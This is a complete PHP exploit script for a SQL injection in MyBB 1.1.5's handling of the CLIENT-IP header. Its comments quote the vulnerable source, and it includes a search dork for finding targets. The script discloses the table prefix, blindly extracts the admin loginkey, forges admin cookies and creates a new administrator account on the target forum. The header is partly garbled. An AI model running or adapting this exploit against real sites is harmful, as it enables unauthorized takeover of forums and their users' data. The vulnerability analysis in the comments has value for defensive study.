
MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection



#!/usr/bin/php -q -d short_open_tag=on=0D
rgod@autistici.org\n";=0D 
echo "site: http://retrogod.altervista.org\n";=0D 
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";=0D
/*
works regardless of php.ini settings
*/
// Usage/help: at least the target host and the MyBB web path are required;
// any further arguments are parsed as -p/-P/-T/-u/-d options further down.
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to MyBB\n";
echo "Options:\n";
echo "   -T[prefix]   specify a table prefix different from default (mybb_)\n";
echo "   -u[number]   specify a user id other than 1 (usually admin)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a proxy\n";
echo "   -d:          disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
die;
}
/* software site: http://www.mybboard.com/

   vulnerable code in inc/functions.php near lines 1292-1320:
=0D
   ...=0D
   function getip() {=0D
	global $_SERVER;=0D
	if($_SERVER['HTTP_X_FORWARDED_FOR'])=0D
	{=0D
		if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))=0D
		{=0D
			while(list($key, $val) = each($addresses[0]))=0D
			{=0D
				if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))=0D
				{=0D
					$ip = $val;=0D
					break;=0D
				}=0D
			}=0D
		}=0D
	}=0D
	if(!$ip)=0D
	{=0D
		if($_SERVER['HTTP_CLIENT_IP'])=0D
		{=0D
			$ip = $_SERVER['HTTP_CLIENT_IP'];=0D
		}=0D
		else=0D
		{=0D
			$ip = $_SERVER['REMOTE_ADDR'];=0D
		}=0D
	}=0D
	return $ip;=0D
}=0D
...=0D
=0D
you can spoof your ip address through the CLIENT-IP http header: unlike
X-Forwarded-For, which is filtered down to a dotted-quad address by a regex,
HTTP_CLIENT_IP is taken from the request as-is.
as a result you can inject sql statements in class_session.php at lines 36-68,
where that value is concatenated unescaped into the sessions query,
by calling the main index.php script:
...=0D
function init()=0D
	{=0D
		global $ipaddress, $db, $mybb, $noonline;=0D
		//=0D
		// Get our visitors IP=0D
		//=0D
		$this->ipaddress = $ipaddress = getip();=0D
=0D
		//=0D
		// User-agent=0D
		//=0D
		$this->useragent = $_SERVER['HTTP_USER_AGENT'];=0D
		if(strlen($this->useragent) > 100)=0D
		{=0D
			$this->useragent = substr($this->useragent, 0, 100);=0D
		}=0D
=0D
		//=0D
		// Attempt to find a session id in the cookies=0D
		//=0D
		if($_COOKIE['sid'])=0D
		{=0D
			$this->sid = addslashes($_COOKIE['sid']);=0D
		}=0D
		else=0D
		{=0D
			$this->sid = 0;=0D
		}=0D
=0D
		//=0D
		// Attempt to load the session from the database=0D
		//=0D
		$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");=0D
...=0D
=0D
injection is blind, but you can ask true/false questions to the database to
retrieve the admin loginkey.
Through that you can build an admin cookie and create a new admin user through
the admin/users.php script.
Also you can disclose the table prefix.
=0D
--------------------------------------------------------------------------------=0D
=0D
=0D
-*****************************************************************************-=0D
*                                                                            *=0D
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto    *
* grazie Grosso!                                                             *=0D
*                                                                            *=0D
-*****************************************************************************-=0D
 */=0D
=0D
// Silence all PHP warnings/notices (e.g. from fsockopen); outcomes are instead
// detected by string-matching the HTTP response bodies further down.
error_reporting(0);
// Lift the script time limit so the character-by-character loop can run to completion.
ini_set("max_execution_time",0);
// Give up on an unresponsive socket after 5 seconds.
ini_set("default_socket_timeout",5);
=0D
/**
 * Render a string as a simple hex dump.
 *
 * Returns a line of two-digit lowercase hex byte values, then CRLF, then the
 * printable-ASCII rendering of the same bytes (anything outside 33..126 shown
 * as "."); both views wrap with CRLF after every 15 bytes. Not referenced
 * anywhere else in this listing.
 */
function quick_dump($string)
{
  $hexPart = '';
  $asciiPart = '';
  $column = 0;
  $length = strlen($string);
  for ($pos = 0; $pos < $length; $pos++)
  {
    $byte = ord($string[$pos]);
    // Control characters, space and non-ASCII bytes are masked with a dot.
    $asciiPart .= ($byte <= 32 || $byte > 126) ? "  ." : "  ".$string[$pos];
    // Always two hex digits, zero-padded.
    $hexPart .= sprintf(" %02x", $byte);
    $column++;
    if ($column == 15)
    {
      $column = 0;
      $hexPart .= "\r\n";
      $asciiPart .= "\r\n";
    }
  }
  return $hexPart."\r\n".$asciiPart;
}
// Proxy argument must look like ip:port. The surrounding parentheses act as
// the PCRE delimiters here (PHP accepts bracket pairs as delimiters), so the
// pattern itself is \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Send one raw HTTP request and capture the whole raw response.
 *
 * @param string $packet  complete request text (request line, headers, body)
 *
 * Reads the globals $proxy, $host, $port and $proxy_regex; writes the raw
 * response (status line, headers and body, untouched) into the global $html.
 * On any connection failure it prints a message and terminates the script.
 */
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // Direct connection to the target host.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   // $proxy must match ip:port (see $proxy_regex); the caller has already
   // built an absolute URL into the request line for this case.
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    // Read until the server closes the connection (requests send "Connection: Close").
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    // Read one byte at a time. Note the "or": the loop continues while EITHER
    // the socket is still open OR no blank line (CRLFCRLF) has been seen yet,
    // so a proxy that closes without ever sending a blank line leaves this
    // loop spinning on an empty fread(). eregi() was removed in PHP 7.0, so
    // this branch (and the eregi() checks later in the file) require PHP 5.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
=0D
/**
 * Build a seed for srand() from the wall clock: whole epoch seconds plus the
 * microsecond fraction scaled by 100000. Returns a float, so two calls within
 * the same microsecond yield the same seed.
 */
function make_seed()
{
   $parts = explode(' ', microtime());
   // microtime() yields "fraction seconds"; index 0 is the fraction, 1 the seconds.
   $scaledFraction = (float) $parts[0] * 100000;
   return (float) $parts[1] + $scaledFraction;
}
// Seed the (non-cryptographic) PRNG and draw a number that is only used as a
// uniqueness suffix in the form data built later in the file.
srand(make_seed());
$anumber = rand(1,99999);
=0D
// Positional arguments: target host and the web path of the MyBB install.
$host=$argv[1];
$path=$argv[2];
// Defaults; each may be overridden by the options parsed below.
$port=80;
$prefix="mybb_";
$user_id="1";//admin
$proxy="";
$dt=0;
// An option is recognised by its first two characters; the rest of the same
// argument is its value (e.g. "-p8080", "-Tmy_"). Arguments shorter than two
// characters are not handled.
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-d")
{
  $dt=1;
}
}
// The path must start and end with "/" so script names can be appended to it.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line carries an absolute URL; otherwise the bare path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
=0D
// -d: table-prefix disclosure. A malformed value is sent in the CLIENT-IP
// header; if the application echoes the MySQL syntax error into the page, the
// token immediately before "sessions" in that message is taken as the prefix.
// Returning raw database error text to clients is what makes this step
// possible; a hardened deployment logs such errors server-side instead.
if ($dt)
{
$sql="'suntzuuuu/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html))
{
 // Split the response on "sessions" and keep the last space-separated token before it.
 $temp=explode("sessions",$html);
 $temp2=explode(" ",$temp[0]);
 $prefix=$temp2[count($temp2)-1];
 echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
}
else
{
echo "unable to disclose table prefix...\n";
}
sleep(1);
}
=0D
// Candidate byte values tried for each loginkey character: NUL (treated as
// end of string), digits, A-Z and a-z.
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(65,90));//A-Z letters
$chars=array_merge($chars,range(97,122));//a-z letters
$j=1;
$loginkey="";
// Blind, character-by-character recovery of the loginkey: for position $j every
// candidate is tested with one true/false query sent through CLIENT-IP, and the
// script treats the text "Hello There" in the response as the "true" answer.
// The outer loop ends once a NUL has been appended.
while (!strstr($loginkey,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
}
// Only reached when no candidate produced a match for this position.
if ($i==255) {die("Exploit failed...");}
}
  $j++;
}
// The recovered key, minus its NUL terminator, becomes the cookie values.
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
echo "admin cookie -> ".$cookie."\r\n";
=0D
=0D
// multipart/form-data body for the admin "add user" form. The boundary string
// must match the one in the Content-Type header below; Content-Length is
// computed from $data so the two stay consistent.
$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="action";

do_add
-----------------------------7d62702f250530
Content-Disposition: form-data; name="userusername";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="newpassword";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";

suntzoi@suntzu.org
-----------------------------7d62702f250530
Content-Disposition: form-data; name="usergroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="additionalgroups[]";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="displaygroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="Add User";

  Add User
-----------------------------7d62702f250530--
';

// The request is authenticated solely by the forged cookie built above.
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
// Success is detected by string-matching the confirmation message in the response.
if (eregi("The user has successfully been added",$html))
{
  echo "exploit succeeded... now login as admin\n";
  echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
}
else
{
  echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
}
?>=0D
=0D
original url: http://retrogod.altervista.org/mybb_115_sql.html
